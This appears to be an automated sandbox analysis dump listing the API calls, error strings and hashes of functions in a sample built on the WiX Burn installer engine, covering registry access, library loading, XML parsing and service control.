                                                                                                                                                                                                                                                                            • String ID: Failed to open key: %ls$Failed to read value: %ls/@%ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 47109696-2566192520
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 008E7385
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008E7398
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7357
                                                                                                                                                                                                                                                                            • Failed while running , xrefs: 008E7345
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessagePostWindow
                                                                                                                                                                                                                                                                            • String ID: Failed while running $d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3618638489-2348268852
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 008E97B5
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,008E6E9A,00000001,008E6DEA,?,?,?,00947562,00000000), ref: 0093BFE1
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetProcAddress.KERNEL32(00000000), ref: 0093BFE8
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetLastError.KERNEL32(?,?,?,00947562,00000000), ref: 0093C010
                                                                                                                                                                                                                                                                              • Part of subcall function 008E8AA9: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020019,00000002,00000000), ref: 008E8B61
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008E9811
                                                                                                                                                                                                                                                                            • Failed to set variant value., xrefs: 008E97FF
                                                                                                                                                                                                                                                                            • Failed to get 64-bit folder., xrefs: 008E97D8
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to get 64-bit folder.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3109562764-867371702
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ControlService.ADVAPI32(0091984C,00000001,?,00000000,00000000,?,?,?,?,?,?,0091984C,00000000), ref: 00919994
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,0091984C,00000000), ref: 0091999E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ControlErrorLastService
                                                                                                                                                                                                                                                                            • String ID: Failed to stop wusa service.$d:\a\wix4\wix4\src\burn\engine\msuengine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 4114567744-2199517983
                                                                                                                                                                                                                                                                            • Opcode ID: 095e010564d69694a3f76ad841b4728b45492e3db838f3b3a61301e7ed543e54
                                                                                                                                                                                                                                                                            • Instruction ID: f60c67563aaf8cff0040c8646e664d9f3285cc1c54cd8ba9afd9523a28dd4656
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 095e010564d69694a3f76ad841b4728b45492e3db838f3b3a61301e7ed543e54
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E001B572B0022877DB109A699C45FAFB6ACEB4AB54F014129FD05FB280E564AC4086E5
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,00000000,?,00000000,?,?,?,008EE202,0100147D,?,?,00000000,00000000), ref: 00943B7B
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,008EE202,0100147D,?,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 00943B85
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastSize
                                                                                                                                                                                                                                                                            • String ID: Failed to get size of file.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 464720113-3816715765
                                                                                                                                                                                                                                                                            • Opcode ID: 678e149692a7ab28ca2667a5b700b860c92e27b355366be9513a81736a476418
                                                                                                                                                                                                                                                                            • Instruction ID: e71c1aed22e4f58b016ac54840fce77cfe23aba25ba1cc2d16968baba3a81338
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 678e149692a7ab28ca2667a5b700b860c92e27b355366be9513a81736a476418
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F30188B6A102297BD7105B55DC45F7EBBACEF45754F01811ABD04E7240E374AE00D7E0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00940489
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 009404DB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$AllocFree
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed SysAllocString
                                                                                                                                                                                                                                                                            • API String ID: 344208780-608482133
                                                                                                                                                                                                                                                                            • Opcode ID: d174f40b284ac649ca97172e7bd83b3ba364315c374d1c48c07c2fcea27686bb
                                                                                                                                                                                                                                                                            • Instruction ID: 6cbec507c3143308eab6caee57483467e4851d5052d283628e542b495bf0a95d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d174f40b284ac649ca97172e7bd83b3ba364315c374d1c48c07c2fcea27686bb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B01DB72640225B7CB325F199C48F6F7AACEBC5B64F158015FF08A7260E7758D01D6E1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E13DA: GetModuleHandleW.KERNEL32(kernel32,00000000,008E15E3,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E13ED
                                                                                                                                                                                                                                                                              • Part of subcall function 008E13DA: GetLastError.KERNEL32(?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E13F9
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?), ref: 008E1855
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E1866
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get load library with LOAD_LIBRARY_SEARCH_SYSTEM32., xrefs: 008E1893
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp, xrefs: 008E1888, 008E188D, 008E189F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$HandleLibraryLoadModule
                                                                                                                                                                                                                                                                            • String ID: Failed to get load library with LOAD_LIBRARY_SEARCH_SYSTEM32.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 4252302101-2751505537
                                                                                                                                                                                                                                                                            • Opcode ID: b32d3331257cdc058c38a00aaee660609298b8a77904fabe278c571b259cff93
                                                                                                                                                                                                                                                                            • Instruction ID: a65bdebcbf2765f149f19f036b2e8be5522245cc6c547e2a073e7ec3e6021437
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b32d3331257cdc058c38a00aaee660609298b8a77904fabe278c571b259cff93
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF018F7AA4157577DF615A5A8C0EF5E7A58FB03BA1F014135FE08EB290E6708C0097D5
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 008F5793
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 008F57BA
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008F57C4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • BootstrapperApplicationDestroy, xrefs: 008F578B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressErrorFreeLastLibraryProc
                                                                                                                                                                                                                                                                            • String ID: BootstrapperApplicationDestroy
                                                                                                                                                                                                                                                                            • API String ID: 1144718084-3186005537
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(?,008F7A20,008E6CF2,EstimatedSize,000000FF,008E6CF2,00000000,?,008F9AF0,00000000,00000390,000000F8,008E6CF2,009031C1,00000000,00000000), ref: 0093D7AD
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                                                                            • String ID: EstimatedSize$Failed to set %ls value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3702945584-416555833
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(008E7D5B), ref: 00940050
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 009400A0
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$AllocFree
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed SysAllocString
                                                                                                                                                                                                                                                                            • API String ID: 344208780-608482133
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringOrdinal.KERNEL32(00000000,00000009,00000008,0000000D,00000001,00000000,00000001,?,00941359,00000000,000000FF,00000000,000000FF,00000000,00000001,00000014), ref: 0094119A
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00941359,00000000,000000FF,00000000,000000FF,00000000,00000001,00000014,00000015,00000010,00000011,0000000C,0000000D,00000008,00000009), ref: 009411A6
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareErrorLastOrdinalString
                                                                                                                                                                                                                                                                            • String ID: Failed to compare version substrings$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\verutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2427233125-1336685116
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,BundleExtensionDestroy), ref: 008F0603
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 008F061E
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008F0628
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressErrorFreeLastLibraryProc
                                                                                                                                                                                                                                                                            • String ID: BundleExtensionDestroy
                                                                                                                                                                                                                                                                            • API String ID: 1144718084-3206861012
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 009401DE: VariantInit.OLEAUT32(?), ref: 009401F5
                                                                                                                                                                                                                                                                              • Part of subcall function 009401DE: VariantClear.OLEAUT32(?), ref: 00940340
                                                                                                                                                                                                                                                                              • Part of subcall function 009401DE: SysFreeString.OLEAUT32(00000000), ref: 0094034B
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,yes,000000FF,008E7D9B,?,00000000,00000000,?,?,008EBB5B,008E7D9B,Hidden,?), ref: 00940563
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 00940544
                                                                                                                                                                                                                                                                            • Failed to get attribute., xrefs: 00940535
                                                                                                                                                                                                                                                                            • yes, xrefs: 00940555
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: StringVariant$ClearCompareFreeInit
                                                                                                                                                                                                                                                                            • String ID: Failed to get attribute.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$yes
                                                                                                                                                                                                                                                                            • API String ID: 2896382772-315762043
                                                                                                                                                                                                                                                                            • Opcode ID: 541fd4984fb669aa5efa9505e914556fbc07d1832f45518a7fb442210023af6d
                                                                                                                                                                                                                                                                            • Instruction ID: e68143d65c5343779570437573bf47e623f938a265a0ba84c9422389494355f2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 541fd4984fb669aa5efa9505e914556fbc07d1832f45518a7fb442210023af6d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58012632A94229BBDF10AAB9CC0BF9E7A68EB51725F108310BA14F71D0C6705B10EA90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 008E9730
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BCAF: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0093BCD0
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BCAF: GetLastError.KERNEL32 ref: 0093BCDA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008E9757, 008E978C
                                                                                                                                                                                                                                                                            • Failed to set variant value., xrefs: 008E977A
                                                                                                                                                                                                                                                                            • Failed to check if process token has privilege: %ls., xrefs: 008E9745
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CurrentErrorLastLookupPrivilegeProcessValue
                                                                                                                                                                                                                                                                            • String ID: Failed to check if process token has privilege: %ls.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3865200005-2747678004
                                                                                                                                                                                                                                                                            • Opcode ID: b8cd2897d73294255fa005fe55d0402d5181d8a3581224e2c6800dfb8f398cad
                                                                                                                                                                                                                                                                            • Instruction ID: 8794bbd3192a11ddb937c8df695fc4bfbfa239d35820dc9422b81eea590d5a1f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8cd2897d73294255fa005fe55d0402d5181d8a3581224e2c6800dfb8f398cad
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8EF0A4B2A8021477EB11EA96CC0BFDE3A6CEB46B95F014110FE44EA1C1D6A09E1497E1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 008E943F
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BD94: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,008E944B,00000000), ref: 0093BDA7
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BD94: GetProcAddress.KERNEL32(00000000), ref: 0093BDAE
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BD94: GetLastError.KERNEL32(?,?,?,?,008E944B,00000000), ref: 0093BDD8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008E9491
                                                                                                                                                                                                                                                                            • Failed to set variant value., xrefs: 008E947F
                                                                                                                                                                                                                                                                            • Failed to get native machine value., xrefs: 008E9451
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to get native machine value.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 896058289-3337725491
                                                                                                                                                                                                                                                                            • Opcode ID: d1f52d5b7a751d978c614106aee0ca67698c58170cc06468973944425b323a35
                                                                                                                                                                                                                                                                            • Instruction ID: 0f0c642d99481c08755dd7061be412b879116697eda7add3c20d755da8bdd261
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1f52d5b7a751d978c614106aee0ca67698c58170cc06468973944425b323a35
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59F0F6B2F8026572DA21E6968C0AFDF355CDB42B59F014111FA84FA1C0E6E0DD008795
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: GetProcAddress.KERNEL32(00000000,BundleExtensionDestroy), ref: 008F0603
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: FreeLibrary.KERNEL32(00000000), ref: 008F061E
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: GetLastError.KERNEL32 ref: 008F0628
                                                                                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 008E7385
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008E7398
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7131
                                                                                                                                                                                                                                                                            • Failed to create the message window., xrefs: 008E71A8
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressErrorFreeLastLibraryMessagePostProcWindow
                                                                                                                                                                                                                                                                            • String ID: Failed to create the message window.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1565363025-1122250624
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: GetProcAddress.KERNEL32(00000000,BundleExtensionDestroy), ref: 008F0603
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: FreeLibrary.KERNEL32(00000000), ref: 008F061E
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: GetLastError.KERNEL32 ref: 008F0628
                                                                                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 008E7385
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008E7398
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7131
                                                                                                                                                                                                                                                                            • Failed to query registration., xrefs: 008E71CB
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressErrorFreeLastLibraryMessagePostProcWindow
                                                                                                                                                                                                                                                                            • String ID: Failed to query registration.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1565363025-1827799990
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: GetProcAddress.KERNEL32(00000000,BundleExtensionDestroy), ref: 008F0603
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: FreeLibrary.KERNEL32(00000000), ref: 008F061E
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: GetLastError.KERNEL32 ref: 008F0628
                                                                                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 008E7385
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008E7398
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7131
                                                                                                                                                                                                                                                                            • Failed to check global conditions, xrefs: 008E716A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressErrorFreeLastLibraryMessagePostProcWindow
                                                                                                                                                                                                                                                                            • String ID: Failed to check global conditions$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1565363025-665746148
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: GetProcAddress.KERNEL32(00000000,BundleExtensionDestroy), ref: 008F0603
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: FreeLibrary.KERNEL32(00000000), ref: 008F061E
                                                                                                                                                                                                                                                                              • Part of subcall function 008F05D5: GetLastError.KERNEL32 ref: 008F0628
                                                                                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 008E7385
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008E7398
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E7131
                                                                                                                                                                                                                                                                            • Failed to open log., xrefs: 008E711F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressErrorFreeLastLibraryMessagePostProcWindow
                                                                                                                                                                                                                                                                            • String ID: Failed to open log.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1565363025-1747915094
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,00929A94,00000000,00000001,0097CD30,?,?,?,00929C37,00000004,InitializeCriticalSectionEx,0096C2FC,InitializeCriticalSectionEx), ref: 00929AF0
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00929A94,00000000,00000001,0097CD30,?,?,?,00929C37,00000004,InitializeCriticalSectionEx,0096C2FC,InitializeCriticalSectionEx,00000000,?,009299B0), ref: 00929AFA
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,009294B3), ref: 00929B22
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                                                                            • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                            • Opcode ID: 65ece9eb7c8233ce75149e70c5b4bf33a68cf2a6b4ce45e0a75231743dd308ee
                                                                                                                                                                                                                                                                            • Instruction ID: 76480b8fbe60b246888391de5c36e9131a898d42d9ef08e11883159ba4de9eb9
